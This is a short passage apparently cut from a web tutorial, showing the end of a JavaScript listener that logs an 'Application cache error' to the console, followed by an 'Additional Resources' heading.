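    console.log('Application cache error', e);
}, false);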

Additional Resources